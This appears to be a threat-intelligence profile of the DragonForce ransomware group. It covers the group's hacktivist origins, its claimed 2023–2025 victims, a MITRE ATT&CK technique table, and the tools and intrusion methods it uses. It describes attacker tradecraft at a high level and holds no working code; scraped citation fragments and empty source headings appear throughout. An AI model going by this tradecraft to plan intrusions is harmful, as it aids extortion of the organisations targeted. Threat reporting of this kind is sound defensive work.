DragonForce Ransomware – Hacktivist Turned Cybercriminal Enterprise

DragonForce is a ransomware and data extortion group that evolved from a pro-Palestinian hacktivist collective into a financially motivated cybercriminal enterprise.
DragonForce Ransomware – Hacktivist Turned Cybercriminal Enterprise
Table of Contents
    Add a header to begin generating the table of contents

    Overview

    DragonForce is a ransomware and data extortion group that evolved from a pro-Palestinian hacktivist collective into a financially motivated cybercriminal enterprise. The group emerged prominently in late 2023 and gained notoriety in 2024 through widespread attacks across retail, education, and manufacturing sectors. Known for using double extortion tactics, DragonForce both encrypts data and threatens to leak sensitive files on their public leak site, “DragonLeaks.” Their tactics suggest a hybrid structure, blending ideological narratives with profit-driven ransomware operations.

    Known Aliases

    • DragonForce Malaysia (former hacktivist identity)
    • DragonForce Ransomware Gang
    • DragonLeaks (leak site)
    • DFRansom

    Country of Origin

    DragonForce ransomware is believed to originate from Malaysia, with core affiliations tracing back to Southeast Asia.

    Notable Attacks / High-Profile Victims of DragonForce Ransomware

    1. Marks & Spencer (M&S) – April 2025

    In late April 2025, M&S, one of Britain’s largest department store chains, suffered a significant ransomware attack that disrupted online orders, in-store payment systems, and warehouse operations. The attack led to unauthorized access to customer data, including names, addresses, and order histories. Security experts linked the breach to affiliates of DragonForce, who deployed the DragonForce ransomware encryptor on M&S’s network. The attackers reportedly used techniques associated with the “Scattered Spider” group, suggesting initial access was gained through social engineering.The Guardian

    Sources:

    2. Co-op Group – April 2025

    Shortly after the M&S incident, the Co-op Group, a major UK grocery and insurance retailer, experienced a cyberattack that disrupted supply chains and led to empty shelves across stores. The attack compromised ordering and logistics systems, and hackers accessed customer and employee data. While Co-op initially described the incident as contained, internal communications revealed significant concerns, including suspending VPN access and advising heightened vigilance on digital platforms. The attack pattern aligns with DragonForce’s affiliates, utilizing social engineering tactics for initial access.

    3. Harrods – May 2025

    In early May 2025, Harrods, the luxury London department store, confirmed a cyberattack that led to the restriction of internet access across its stores and facilities as a precaution. While Harrods stated that its stores remained operational and online shopping was unaffected, the timing and similarity to the M&S and Co-op attacks raised speculation of a coordinated campaign. However, there is no official confirmation linking DragonForce to this incident.

    4. Saudi Real Estate and Construction Firm – February 2025

    DragonForce targeted a prominent real estate and construction company in Riyadh, Saudi Arabia, exfiltrating over 6 terabytes of sensitive data. The attack, strategically timed before Ramadan, aimed to pressure the victim into paying a ransom. Upon refusal, DragonForce publicly leaked the stolen data, including confidential client and operational documents. This marked the group’s first major ransomware incident targeting a large enterprise in the Kingdom.Gurucul+3gbhackers.com+3builtenvironmentme.com+3gbhackers.com+2builtenvironmentme.com+2builtenvironmentme.com+2

    Sources:

    5. Ohio Lottery – December 2023

    DragonForce breached the Ohio Lottery’s systems, claiming to have stolen over 600 GB of data, including sensitive information such as names, email addresses, and Social Security Numbers. This high-profile attack demonstrated the group’s capability to target government-operated entities.

    6. Yakult Australia – Date Unspecified

    The group claimed a breach of Yakult Australia’s systems, exfiltrating approximately 95.19 GB of company data. Details about the specific nature of the data or the impact on operations remain limited.

    7. Coca-Cola Singapore – Date Unspecified

    DragonForce claimed to have breached Coca-Cola’s Singapore operations, stealing over 400 GB of data. The specifics of the data compromised and the operational impact have not been publicly disclosed.Red Piranha+1Solace Cyber+1

    Source:

    MITRE ATT&CK Tactics and Techniques Used by DragonForce Ransomware

    DragonForce leverages a range of tactics and techniques commonly observed in financially motivated ransomware groups:

    TacticTechniqueID
    Initial AccessExploit Public-Facing ApplicationT1190
    Initial AccessValid Accounts (stolen credentials)T1078
    ExecutionCommand and Scripting InterpreterT1059.001
    PersistenceCreate or Modify System ProcessT1543
    Privilege EscalationAbuse Elevation Control MechanismT1548
    Defense EvasionObfuscated Files or InformationT1027
    Credential AccessOS Credential DumpingT1003
    Lateral MovementRemote Services (e.g., RDP, SMB)T1021
    ExfiltrationExfiltration Over Web ServicesT1567.002
    ImpactData Encrypted for ImpactT1486

    Malware Strains Used by DragonForce Ransomware

    • Custom ransomware payloads developed from publicly available builder kits
    • Phobos (earlier campaigns)
    • Cobalt Strike (post-exploitation)
    • RClone and MEGA (data exfiltration)
    • Mimikatz (credential harvesting)
    • Remote access tools like AnyDesk and TeamViewer

    Common Methods of Infiltration Used by DragonForce Ransomware

    • Exploiting unpatched vulnerabilities in public-facing systems (e.g., Fortinet, WordPress)
    • Phishing emails targeting admin or IT staff
    • Use of compromised remote desktop credentials (purchased or stolen)
    • Abuse of weak MFA implementations or lack of segmentation
    • Deployment of remote access tools to maintain persistence

    Related Posts